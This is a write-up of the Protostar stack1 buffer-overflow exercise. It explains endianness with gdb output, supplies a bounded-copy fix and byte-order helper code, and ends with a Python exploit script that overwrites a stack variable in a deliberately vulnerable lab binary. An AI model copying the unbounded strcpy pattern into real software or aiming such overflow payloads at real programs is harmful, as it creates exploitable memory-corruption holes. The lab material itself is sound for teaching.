In the previous exercise we used a stack overflow to change the value of the stack variable modified, but we had no control over what value it was changed to. In this exercise we try to set modified to one specific value, which requires understanding how a variable is laid out in memory.
```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>      /* declares errx(); missing from the listing as posted */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);   /* unbounded copy: the overflow is here */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
```
This time buffer is not filled by gets inside the program but by the argument passed on the command line when the program is run. That does not change the payload itself, only how the exploit code delivers it; we set that detail aside for now.
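The root cause is the unbounded strcpy: argv[1] is copied into a 64-byte buffer with no length check, so anything longer overwrites modified and the saved registers above it. The following is an added example, not code from the original post or from the Protostar source: a hypothetical bounded copy_arg that refuses any argument that does not fit, and a run_hardened wrapper (also hypothetical) that keeps the exercise's 64-byte layout so you can confirm the variable above the buffer is never touched.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 64   /* same buffer size as the exercise */

/* Bounded replacement for strcpy(buffer, argv[1]).
 * Returns 0 and copies src including its NUL when it fits in dst,
 * otherwise returns -1 and leaves dst untouched.
 * Hypothetical helper written for this example, not part of Protostar. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    /* memchr scans at most dstsz bytes and stops at the first NUL,
     * so an over-long argument is detected without reading past dstsz. */
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)
        return -1;                       /* no room for the terminator */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Mirrors the structure of the exercise's main() with the bounded copy.
 * Returns the value of modified after the copy (always 0, the buffer can
 * no longer spill into it), or -1 when the argument was rejected. */
long run_hardened(const char *arg)
{
    volatile int modified = 0;
    char buffer[BUF_SIZE];

    if (copy_arg(buffer, sizeof buffer, arg) != 0)
        return -1;                       /* rejected: nothing was written */
    return modified;
}

/* Boundary check: an argument of len bytes of 'A'. 63 bytes fit
 * (63 + NUL = 64), 64 bytes do not. Returns copy_arg's result. */
int arg_of_length_fits(size_t len)
{
    char src[200], dst[BUF_SIZE];
    if (len >= sizeof src)
        return -1;
    memset(src, 'A', len);
    src[len] = '\0';
    return copy_arg(dst, sizeof dst, src);
}

/* Constructed 68-byte input, the same length as the exercise's payload
 * (17 repeats of four characters). */
static const char OVERLONG_ARG[] =
    "dcbadcbadcbadcbadcba" "dcbadcbadcbadcbadcba"
    "dcbadcbadcbadcbadcba" "dcbadcba";

int main(void)
{
    printf("short arg  -> modified = %ld\n", run_hardened("abcd"));
    printf("68-byte arg -> result = %ld (rejected)\n", run_hardened(OVERLONG_ARG));
    printf("63 bytes fit: %d, 64 bytes fit: %d\n",
           arg_of_length_fits(63) == 0, arg_of_length_fits(64) == 0);
    return 0;
}
```

The check is done against the destination size, not the source length, which is the property that matters: a caller can never pass more than BUF_SIZE - 1 bytes through copy_arg regardless of what argv[1] contains.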
From the code, the goal of this exercise is to set modified to 0x61626364. The stack layout should be the same as in the stack0 exercise, but we run it under gdb once more; this time, to observe how the variable is laid out in memory, we use "abcd" as the input:
```text
$ gdb stack1
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack1...done.
(gdb) b 18
Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18.
(gdb) r abcd
Starting program: /opt/protostar/bin/stack1 aaaa

Breakpoint 1, main (argc=2, argv=0xbffffd64) at stack1/stack1.c:18
18      stack1/stack1.c: No such file or directory.
        in stack1/stack1.c
(gdb) print $esp
$1 = (void *) 0xbffffc50
(gdb) print $ebp
$2 = (void *) 0xbffffcb8
(gdb) x/26xw $esp
0xbffffc50:     0xbffffc6c      0xbffffe94      0xb7fff8f8      0xb7f0186e
0xbffffc60:     0xb7fd7ff4      0xb7ec6165      0xbffffc78      0x64636261
0xbffffc70:     0xb7fd7f00      0x080496fc      0xbffffc88      0x08048334
0xbffffc80:     0xb7ff1040      0x080496fc      0xbffffcb8      0x08048509
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0x080484f0      0xbffffcb8
0xbffffca0:     0xb7ec6365      0xb7ff1040      0x080484fb      0x00000000
0xbffffcb0:     0x080484f0      0x00000000
(gdb) info address modified
Symbol "modified" is a local variable at frame offset 92.
```
We can see that the input "abcd" is stored on the stack as 0x64636261: x86 is little-endian, so the first byte of the string ('a', 0x61) becomes the least significant byte of the word. Therefore, to set modified to 0x61626364, we reverse the order and use the payload "dcba"*17.
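The byte reversal above is the whole point of the exercise, so here is an added example (not from the original post) that makes it explicit: le32_from_bytes reads four bytes as a little-endian word the way the x86 CPU reads modified from the stack, le32_to_bytes is the inverse, and host_word_from_bytes reads the bytes through memcpy so you can compare the host's native byte order against the explicit computation. All function names are this example's own.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Interpret the first four bytes of s as a little-endian 32-bit word.
 * Computed byte by byte so the result is the same on any host. */
uint32_t le32_from_bytes(const char *s)
{
    const unsigned char *p = (const unsigned char *)s;
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}

/* Inverse: the four bytes (least significant first) whose little-endian
 * reading is v, NUL-terminated so it can be printed as a string. */
void le32_to_bytes(uint32_t v, char out[5])
{
    out[0] = (char)(v & 0xff);
    out[1] = (char)((v >> 8) & 0xff);
    out[2] = (char)((v >> 16) & 0xff);
    out[3] = (char)((v >> 24) & 0xff);
    out[4] = '\0';
}

/* Convenience check: does v encode to exactly the string expected? */
int le32_bytes_equal(uint32_t v, const char *expected)
{
    char buf[5];
    le32_to_bytes(v, buf);
    return strcmp(buf, expected) == 0;
}

/* Read the bytes the way the CPU does, via memcpy into an integer.
 * On a little-endian host (x86, as in the exercise) this matches
 * le32_from_bytes; on a big-endian host it would not. */
uint32_t host_word_from_bytes(const char *s)
{
    uint32_t v;
    memcpy(&v, s, sizeof v);
    return v;
}

int host_is_little_endian(void)
{
    return host_word_from_bytes("\x01\x00\x00\x00") == 1;
}

int main(void)
{
    char bytes[5];
    printf("\"abcd\" read as a word: 0x%08x\n", le32_from_bytes("abcd"));
    le32_to_bytes(0x61626364u, bytes);
    printf("bytes that read as 0x61626364: \"%s\"\n", bytes);
    printf("memcpy read of \"abcd\": 0x%08x (host is %s-endian)\n",
           host_word_from_bytes("abcd"),
           host_is_little_endian() ? "little" : "big");
    return 0;
}
```

On the exercise's i486 target the two readings agree, which is why the gdb dump shows 0x64636261 for "abcd" and why the payload has to be spelled backwards.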
This time there is no need to interact with the program while it is running, so we can simply use the system function from the os module. The code:
```python
import os

payload = "dcba"*17   # 64 bytes of buffer plus 4 bytes landing in modified
cmd = "/opt/protostar/bin/stack1 " + payload
os.system(cmd)
```
Result:

```text
$ python exploit1.py
you have correctly got the variable to the right value
```